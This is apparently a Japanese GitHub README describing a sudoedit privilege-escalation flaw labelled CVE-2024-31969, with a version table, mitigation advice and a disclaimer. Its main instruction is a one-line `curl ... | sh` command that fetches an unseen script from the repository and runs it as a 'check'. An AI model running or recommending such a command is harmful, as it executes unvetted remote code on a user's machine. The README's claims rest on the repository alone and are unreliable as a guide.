
CVE-2024-31969 は、sudoedit コマンドを使用する際の sudo における ローカル権限昇格 の脆弱性です。
この脆弱性は sudo 1.9.0 以降に導入されました。sudoedit がユーザーの環境変数とファイルの所有権を適切に検証しないことが原因です。
sudo 1.9.0 で導入された欠陥で、
sudoeditがユーザーの環境変数とファイルの所有権を検証する方法に起因します。
この脆弱性により、sudoedit へのアクセス権を持つローカルユーザーが、SUDO_EDITOR などの環境変数の操作やシンボリックリンクを悪用して、任意のファイルを root として変更できる可能性があります。
| Sudo バージョン | 状態 |
|---|---|
| 1.9.0 → 1.9.15p4 | 🔥 影響あり |
| 1.9.15p5 以降 | ✅ 安全 |
| 1.8.x(1.8.23 を含む) | ❌ 影響なし |
以下のコマンドを実行してください:
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh
sudo をバージョン 1.9.15p5 以降に更新してください。sudoedit を許可する sudoers ルールを制限してください。/etc/sudoers ファイル内で安全な env_keep または env_reset 設定を使用してください。このリポジトリは 教育 および セキュリティシステムの文書化 を目的として作成されました。
この情報を違法行為や、システム所有者の書面による許可なく使用することは固く禁じられています。
いかなる悪用も、すべて作成者の責任の範囲外です。